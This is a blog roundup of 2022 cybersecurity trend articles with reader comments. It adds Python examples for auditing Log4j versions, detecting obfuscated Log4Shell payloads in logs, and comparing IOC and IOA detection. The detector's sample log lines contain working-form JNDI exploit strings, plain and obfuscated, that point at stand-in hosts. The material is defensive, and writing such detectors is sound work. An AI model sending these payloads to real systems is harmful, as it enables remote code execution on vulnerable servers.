Cyber security trends for 2022

Nothing is more difficult than making predictions. Instead of throwing out wild ideas about what might be coming, I have collected here some trends other people have predicted or reported.

Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.

Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threat; it's a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.

Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks, cyber criminals will likely learn from this year's successful tactics, retool, and pivot them into next year's campaigns to wreak even more havoc in all our lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats

“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research development and investments. Advanced 5G and wireless networks will benefit higher traffic capacities, lower latency, increased reliability, and enable processing and analytics in real-time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated by searching for vulnerabilities and infiltrating malware by adapting (and automating), enabling machine learning, deep learning, artificial intelligence, and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.

Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability named Log4Shell to infect vulnerable devices. Apache has released several Log4j versions to fix the original vulnerability (CVE-2021-44228) and the findings that followed in Log4j 2 (CVE-2021-45046, CVE-2021-45105, CVE-2021-44832); the related CVE-2021-42550 is a JNDI issue in Logback, a different logging library, and is fixed by updating Logback rather than Log4j.
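To turn the "still using defective versions" count into something you can run against your own build, here is an added Python example (mine, not code from the article or from Google's open-source team). It reads the output of `mvn dependency:tree`, finds every log4j-core occurrence and reports which of the four Log4j 2 CVEs above still apply to that version. The thresholds are the fixed versions Apache published (2.15.0, 2.16.0, 2.17.0 and 2.17.1 on the main line, with the 2.12.x backports for Java 7 and the 2.3.x backports for Java 6); the dependency listing is constructed sample input.

```python
import re
from typing import Dict, List, Tuple

# First log4j-core version in which each CVE is fixed, per release line.
# "main" is the normal 2.x line; 2.12.x (Java 7) and 2.3.x (Java 6) got backports.
FIXED_IN: Dict[str, Dict[str, Tuple[int, int, int]]] = {
    "CVE-2021-44228": {"main": (2, 15, 0), "2.12": (2, 12, 2), "2.3": (2, 3, 1)},
    "CVE-2021-45046": {"main": (2, 16, 0), "2.12": (2, 12, 2), "2.3": (2, 3, 1)},
    "CVE-2021-45105": {"main": (2, 17, 0), "2.12": (2, 12, 3), "2.3": (2, 3, 1)},
    "CVE-2021-44832": {"main": (2, 17, 1), "2.12": (2, 12, 4), "2.3": (2, 3, 2)},
}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(\S+))?$")
# Matches "org.apache.logging.log4j:log4j-core:jar:2.14.1:compile" and the
# shorter "log4j-core:2.14.1" form; group 1 is the version.
_LOG4J_CORE_RE = re.compile(
    r"org\.apache\.logging\.log4j:log4j-core:(?:[\w-]+:)?(\d[^:\s]*)"
)


def parse_version(text: str) -> Tuple[int, int, int, int]:
    """Turn '2.0-beta9' or '2.14.1' into a sortable tuple.

    The fourth element makes pre-releases (e.g. 2.15.0-rc1) sort before the
    corresponding final release (2.15.0)."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised log4j version: {text!r}")
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if pre else 1)


def open_cves(version: str) -> List[str]:
    """CVEs from FIXED_IN that still apply to this log4j-core version."""
    v = parse_version(version)
    if v[0] != 2:
        # Log4j 1.x is end-of-life and has its own CVEs; it is not covered here.
        return []
    line = "2.12" if v[1] == 12 else "2.3" if v[1] == 3 else "main"
    return [cve for cve, fixes in FIXED_IN.items() if v < fixes[line] + (1,)]


def scan_dependency_tree(lines) -> List[Tuple[str, List[str]]]:
    """Return (version, open CVEs) for every log4j-core line in the tree."""
    findings = []
    for line in lines:
        m = _LOG4J_CORE_RE.search(line)
        if m:
            findings.append((m.group(1), open_cves(m.group(1))))
    return findings


# Constructed sample: what `mvn dependency:tree` prints for a project that pulls
# log4j-core directly and again, at an older backport version, transitively.
SAMPLE_TREE = """\
[INFO] com.example:shop:jar:1.0.0
[INFO] +- org.apache.logging.log4j:log4j-api:jar:2.14.1:compile
[INFO] +- org.apache.logging.log4j:log4j-core:jar:2.14.1:compile
[INFO] +- org.springframework:spring-core:jar:5.3.13:compile
[INFO] \\- com.example:legacy-reporting:jar:3.2:compile
[INFO]    \\- org.apache.logging.log4j:log4j-core:jar:2.12.2:compile
""".splitlines()

if __name__ == "__main__":
    for version, cves in scan_dependency_tree(SAMPLE_TREE):
        print(f"log4j-core {version}: {', '.join(cves) or 'no open CVEs from the list'}")
```

The check is only as good as the dependency listing: a shaded or "fat" jar that embeds log4j classes under another artifact name, or a jar copied by hand into a lib directory, never shows up as `log4j-core` at all. For those, scan the class files themselves (the presence of `JndiLookup.class` inside a jar is the usual tell) rather than trusting coordinates.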

Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude.
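The "large number of exploit variations" Akamai mentions were mostly the same `${jndi:...}` lookup wrapped in other Log4j lookups (`${lower:j}`, `${::-j}`, `${env:X:-j}`) so that a naive search for the string "jndi" in request logs would miss them. As an added example (my code, not Akamai's), the Python below normalizes those nesting tricks the way Log4j itself would evaluate them and only then looks for a JNDI lookup, reporting the scheme and target for triage. The access-log lines are constructed.

```python
import re
from typing import List, Optional, Tuple

# Innermost ${...} lookup: no further "${" or "}" inside the braces.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# After normalization a payload looks like ${jndi:ldap://host:port/path}.
_JNDI_RE = re.compile(r"jndi:([a-z]+)://([^/}\s\"']+)", re.IGNORECASE)


def _resolve(expr: str) -> str:
    """Evaluate one innermost lookup the way Log4j 2 does, for the lookups
    attackers used to hide the word 'jndi' from pattern matching:
      ${lower:J} -> j      ${upper:j} -> J
      ${::-j}    -> j      ${env:NOPE:-j} -> j   (":-default" syntax)
    Any other lookup is returned unchanged; we do not emulate the rest."""
    if expr.lower().startswith("lower:"):
        return expr[6:].lower()
    if expr.lower().startswith("upper:"):
        return expr[6:].upper()
    if ":-" in expr:
        return expr.split(":-", 1)[1]
    return "${" + expr + "}"


def normalize(text: str, max_rounds: int = 20) -> str:
    """Collapse nested obfuscating lookups, innermost first, until the
    string stops changing (or max_rounds is hit, to bound the work)."""
    for _ in range(max_rounds):
        new = _INNER_LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def find_jndi(line: str) -> Optional[Tuple[str, str]]:
    """(scheme, target) if the line carries a JNDI lookup after
    de-obfuscation, else None."""
    m = _JNDI_RE.search(normalize(line))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """(line number, scheme, target) for every line with a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = find_jndi(line)
        if found:
            hits.append((n, *found))
    return hits


# Constructed access-log lines: a plain payload in the User-Agent, two
# obfuscated variants, and two benign requests (one with a harmless lookup).
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.20:1389/a}"',
    '198.51.100.8 - - [11/Dec/2021:03:15:19 +0000] "GET /login HTTP/1.1" 200 771 "-" '
    '"${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.21:1389/x}"',
    '198.51.100.9 - - [11/Dec/2021:03:16:02 +0000] '
    '"GET /?x=${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.22/Exploit} HTTP/1.1" '
    '404 0 "-" "curl/7.79.1"',
    '192.0.2.5 - - [11/Dec/2021:03:16:40 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.6 - - [11/Dec/2021:03:17:11 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 88 "-" '
    '"curl/7.79.1"',
]

if __name__ == "__main__":
    for n, scheme, target in scan(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup via {scheme} to {target}")
```

Two caveats: the normalizer only evaluates the handful of lookups seen in the wild, so a new evasion built on a lookup it does not emulate (for example `${date:...}` with quoted literals) is left as-is, and what you find this way is an attempt, not a compromise. Confirming exploitation means looking for the outbound LDAP/RMI connection from the application host to the target address.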

Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.

Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they've successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has emerged: employee burnout.

In 2022, security will be Linux and open-source developers job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It's what all the clouds, even Microsoft Azure, run. It's what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Its real trouble isn't so much with open-source itself. There's nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus's law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I'm now calling Schneier's law, "Security is a process, not a product," points out, constant vigilance is needed to secure all software.

The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been busy allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development: operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who's going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.

Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
We've covered five main topics: 1 Malware, 2 Mobile, 3 Machine Learning and AI, 4 Ransomware (because we simply couldn't not give it a section of its own), and 5 Where next? PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf

“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
• Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
Some specific areas where AI technology will contribute to making cybersecurity smarter include:
• AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
• AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question "what happened," incident diagnosis analytics address the question of "why and how it happened." To answer those questions, new software applications and platforms powered by AI can examine past data sets to find root causes of the incident by looking back at change and anomaly indicators in the network activities.
• AI will also enable better cyberthreat intelligence reports by analysts. Next year analysts will be able to use AI tools to generate automated cyberthreat intelligence reports (CTI). Cyberthreat intelligence reports provide the indicators and early warning necessary to better monitor unusual activities on a given network and detect more rapidly cyber threats.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.

Smartphone security is getting an overhaul
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, security has been in place for more than a decade, with trusted processing performed in the TEE (Trusted Execution Environment) section of device memory. The current standard solution for smartphone security is typically created with Arm’s TrustZone technology. The phone’s own security comes from TEE. A secure boot usually includes a TEE. TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was developed 15 years ago).
The memory required by the TEE has not been available in the small controller chips used for embedded applications. Manufacturers have promoted Safe Boot and Memory Encryption or Flash Encryption, but they have been pretty weak solutions. Recently, Arm’s TrustZone M has introduced a new security model for controllers.
In recent years, this picture has begun to diversify. A revolution is underway now. Google has launched a keystone technology that allows an application to generate a system-maintained key and authenticate services (still uses TEE).
In the future, for example, encryption keys will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei’s HSSL laboratory (Helsinki System Security Lab). Five years ago, Intel introduced SGX technology for PC servers, which simply means security extension commands added to the CPU chip. In this solution, TEE type protections are provided by a secure enclave. The use of this type of security enclave needs less code than traditional TEE structure. An enclave is a temporary structure in the memory of a device. It is created only for security processes and exits when it has completed its task. The difference is significant in the TEE structure, where another kernel runs all the time alongside the operating system. When there is no other parallel kernel, there is one component less to attack.
In Intel’s SGX, enclaves were implemented through caching, which limited their use. Intel has sought to overcome this limitation with newer TDX (Trust Domain Extensions) technology. AMD aims to do the same with its own SEV (Secure Encrypted Virtualization) technology.
Enclave-style solutions will also come to smartphones. The Armv9-A architecture announced last year offers a realm mode that is very close to the technologies offered on the server side (Intel SGX). With the coming enclaves, an unlimited number of secured environments will be available in principle.
In the mobile ecosystem, TEE is so deeply rooted that the transition will probably take five years. During the transition period TEE and more dynamic solutions will be on the market in parallel.

Cyber attacks already threaten deliveries of goods
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools democratize cybercrime from technically savvy individuals and criminal organizations to all. The new “Everything as a Service” service model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf

Jarno Limnéll warns of a "cyber pandemic": an internet disruption could throw the world into chaos again
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are scams. And scammers always seem to be one step ahead. Sometimes they are only revealed years later. "The world is moving in the direction that technology is evolving faster and faster, and rather increasing the possibility of various disruptions and creating new types of vulnerabilities. There is no seamless security," Limnéll says. So even with technology, the world will never be finished. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler's rise to power, the shots in Sarajevo. "In light of history, we're always surprised. And if you think about it, technology only adds to the complexity and surprise of crises."

Cyber attacks are accelerating, but companies can respond to them
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time, in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection. The shift of workers to telecommuting has opened up new avenues for attackers, so the attack surface of companies and organizations has grown exponentially. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Those strategies are:
• Enhanced server security and application management policies to combat extortion
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• Extended Detection and Response (XDR) model to detect attacks on large networks

Trend Micro report: in the future everything is at risk
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.

3,062 Comments

  1. Tomi Engdahl says:

    CISOs face 'perfect storm' of ransomware and state-supported cybercrime
    https://www.theregister.com/2022/03/18/ciso_security_storm/
    With not just ransomware gangs raiding network after network, but nation states consciously turning a blind eye to it, today's chief information security officers are caught in a "perfect storm," says Cybereason CSO Sam Curry. "You get the umbrella of sovereignty, and you get the free license to be a privateer in essence," Curry said.
    "It's not just an economic threat. It's not just a geopolitical threat. It's a perfect storm." While cyber resiliency plays a key role in recovering from an attack, securing corporate IP and other data inside the organization isn't always enough to keep a business up and running. "It can take a simple third-party logistic organization to shut down your entire organization at the same time."

  2. Tomi Engdahl says:

    The Golden Hour of Incident Response
    https://thehackernews.com/2022/03/the-golden-hour-of-incident-response.html
    As a CSIRT consultant, I cannot overemphasize the importance of effectively managing the first hour in a critical incident. Finding out what to do is often a daunting task in a critical incident. In addition, the feeling of uneasiness often prevents an incident response analyst from making effective decisions. However, keeping a cool head and actions planned out is crucial in successfully handling a security incident. This blog will elaborate on some key points to help readers facilitate better incident response procedures.

  3. Tomi Engdahl says:

    A big bet to kill the password for good
    https://arstechnica.com/information-technology/2022/03/a-big-bet-to-kill-the-password-for-good/
    After years of tantalizing hints that a passwordless future is just around the corner, you’re probably still not feeling any closer to that digital unshackling. Ten years into working on the issue, though, the FIDO Alliance, an industry association that specifically works on secure authentication, thinks it has finally identified the missing piece of the puzzle. On Thursday, the organization published a white paper that lays out FIDO’s vision for solving the usability issues that have dogged passwordless features and, seemingly, kept them from achieving broad adoption. The paper is conceptual, not technical, but after years of investment to integrate what are known as the FIDO2 and WebAuthn passwordless standards into Windows, Android, iOS, and more, everything is now riding on the success of this next step. See also:
    https://media.fidoalliance.org/wp-content/uploads/2022/03/How-FIDO-Addresses-a-Full-Range-of-Use-Cases.pdf

  4. Tomi Engdahl says:

    Embarrassing search results can be hidden faster than ever: here's how
    https://www.tivi.fi/uutiset/tv/c1e6095f-8641-4dd1-a423-2c2b9ca8dd29
    The feature has been available in the iOS app since last summer, but Google decided to wait before bringing it to Android users.
    Some users report that the feature is already working in the Android app. The new feature is used by tapping your own profile in the Google app. It is found in the menu below the browsing history, and pressing the button makes the app delete the last 15 minutes of the user's search history. The feature is now available in the iOS and Android versions of the Google app. The company has not yet said whether the feature will come to the desktop version of the app.

  5. Tomi Engdahl says:

    IOCs vs. IOAs: How to Effectively Leverage Indicators
    https://securityintelligence.com/posts/iocs-ioas-how-to-leverage-security-indicators/
    Cybersecurity teams are consistently tasked to identify cybersecurity attacks, adversarial behavior, advanced persistent threats and the dreaded zero-day vulnerability. Through this endeavor, there is a common struggle for cybersecurity practitioners and operational teams to appropriately leverage indicators of compromise (IOCs) and indicators of attack (IOAs) for an effective monitoring, detection and response strategy. Inexperienced security teams and leaders tend to establish a catch-all approach, where quantity outweighs quality to stop the next perceived intrusion attempt. Unfortunately, this strategy rarely provides an operational edge and greatly hinders operational readiness. Obtaining a better understanding of indicators, their intent, and how to better leverage them within your environment is essential to driving good security practices and providing enablement, not hindrance, to your analysts.

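The distinction the Security Intelligence post draws is easiest to see in code. As an added example (mine, not from the post and not from any EDR product), the Python below runs two detectors over the same constructed endpoint telemetry: an IOC matcher that does exact lookups against a blocklist of hashes and addresses, and an IOA rule that looks for behaviour, here an Office application spawning a script host that makes an outbound connection within a minute. The IOC matcher catches only the binary it has already seen; the IOA rule catches the macro-to-PowerShell-to-command-and-control chain even though neither the script host's hash nor the destination address appears on any list. The events, hashes and addresses are all constructed (TEST-NET ranges stand in for internet hosts).

```python
import ipaddress
from typing import Dict, List, Tuple

# Constructed EDR-style telemetry. "t" is seconds since an arbitrary epoch.
EVENTS: List[Dict] = [
    # ws01: Word spawns PowerShell, which beacons out within seconds.
    {"t": 100, "type": "process", "host": "ws01", "pid": 410, "ppid": 300,
     "image": "winword.exe", "parent": "explorer.exe", "sha256": "HASH_WINWORD"},
    {"t": 106, "type": "process", "host": "ws01", "pid": 512, "ppid": 410,
     "image": "powershell.exe", "parent": "winword.exe", "sha256": "HASH_POWERSHELL"},
    {"t": 108, "type": "network", "host": "ws01", "pid": 512,
     "dst": "203.0.113.50", "dport": 443},
    # ws02: a dropped binary whose hash is already on the blocklist.
    {"t": 300, "type": "process", "host": "ws02", "pid": 77, "ppid": 5,
     "image": "update.exe", "parent": "explorer.exe", "sha256": "HASH_BLOCKLISTED"},
    # ws03: an admin runs PowerShell from Explorer and reaches an internal server.
    {"t": 400, "type": "process", "host": "ws03", "pid": 900, "ppid": 20,
     "image": "powershell.exe", "parent": "explorer.exe", "sha256": "HASH_POWERSHELL"},
    {"t": 402, "type": "network", "host": "ws03", "pid": 900,
     "dst": "10.0.5.7", "dport": 5985},
]

# IOCs: concrete artefacts from an earlier incident. Exact match only.
IOCS = {"sha256": {"HASH_BLOCKLISTED"}, "ip": {"198.51.100.9"}}

# IOA: a behaviour, independent of any particular hash or address.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
INTERNAL = [ipaddress.ip_network(n)
            for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
BEACON_WINDOW_S = 60   # child must connect out within this long of starting


def is_internal(ip: str) -> bool:
    """True for RFC 1918 space; everything else is treated as external."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL)


def match_iocs(events: List[Dict], iocs=IOCS) -> List[Tuple[str, str, str]]:
    """(host, indicator type, value) for every event carrying a known-bad artefact."""
    hits = []
    for e in events:
        if e["type"] == "process" and e.get("sha256") in iocs["sha256"]:
            hits.append((e["host"], "sha256", e["sha256"]))
        if e["type"] == "network" and e["dst"] in iocs["ip"]:
            hits.append((e["host"], "ip", e["dst"]))
    return hits


def match_ioa(events: List[Dict]) -> List[Tuple[str, int, str]]:
    """(host, pid, destination) whenever a script host spawned by an Office
    application connects to a non-internal address within BEACON_WINDOW_S."""
    procs = {(e["host"], e["pid"]): e for e in events if e["type"] == "process"}
    hits = []
    for e in events:
        if e["type"] != "network" or is_internal(e["dst"]):
            continue
        p = procs.get((e["host"], e["pid"]))
        if (p and p["image"] in SCRIPT_HOSTS and p["parent"] in OFFICE_APPS
                and 0 <= e["t"] - p["t"] <= BEACON_WINDOW_S):
            hits.append((e["host"], e["pid"], e["dst"]))
    return hits


if __name__ == "__main__":
    print("IOC hits:", match_iocs(EVENTS))   # only ws02's blocklisted hash
    print("IOA hits:", match_ioa(EVENTS))    # ws01's Word -> PowerShell -> C2 chain
```

The trade-off the post describes shows up directly: the IOC list is cheap to match and produces no noise, but it is blind to anything recompiled or re-hosted, while the IOA rule generalizes but needs tuning (the admin's PowerShell on ws03 is excluded only because its parent and destination are ordinary). Quality of indicators, not quantity, is what lets the two complement each other.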
  6. Tomi Engdahl says:

    New Linux kernel has improved random-number generation • The Register
    https://www.theregister.com/2022/03/21/new_linux_kernel_has_improved/
    As outlined by the author of the changes, Jason A Donenfeld, the newly released kernel 5.17 contains the first stage of the big rewrite, but more will follow in 5.18. Among other changes, the /dev/random and /dev/urandom devices now do exactly the same. This brings the Linux kernel in line with FreeBSD and macOS.
    There have been previous big improvements in the kernel RNG. In kernel 4.8, /dev/urandom became cryptographically secure: a new algorithm, ChaCha20, made it resistant to analysis and prediction of forthcoming values. Kernel 5.6 made random and urandom devices similar. In 2020, /dev/random was tweaked to only block while waiting to be initialized. And now, both devices behave the same so you can use either without worry of processes stalling on an entropy drought nor worries about predictable randomness.
    The changes in 5.17 eliminate use of the SHA-1 algorithm, which was cracked in 2005 and was being gradually replaced for years. Now it’s gone, replaced by BLAKE2, a descendant of ChaCha20.

  7. Tomi Engdahl says:

    Russia proposes recruiting IT professionals into cyber forces: "they would think 10 times before leaving their homeland"
    https://www.tivi.fi/uutiset/tv/de733dac-bb16-496f-af55-6824e3c7004a
    The possible establishment of cyber forces was recently discussed at a meeting of the Russian Duma's committee on information policy.
    The proposal was made by Vasily Shpak, deputy head of Russia's Ministry of Industry and Trade. According to the business paper Kommersant, he justifies establishing cyber forces by saying it would get Russian IT professionals to develop their patriotic qualities.
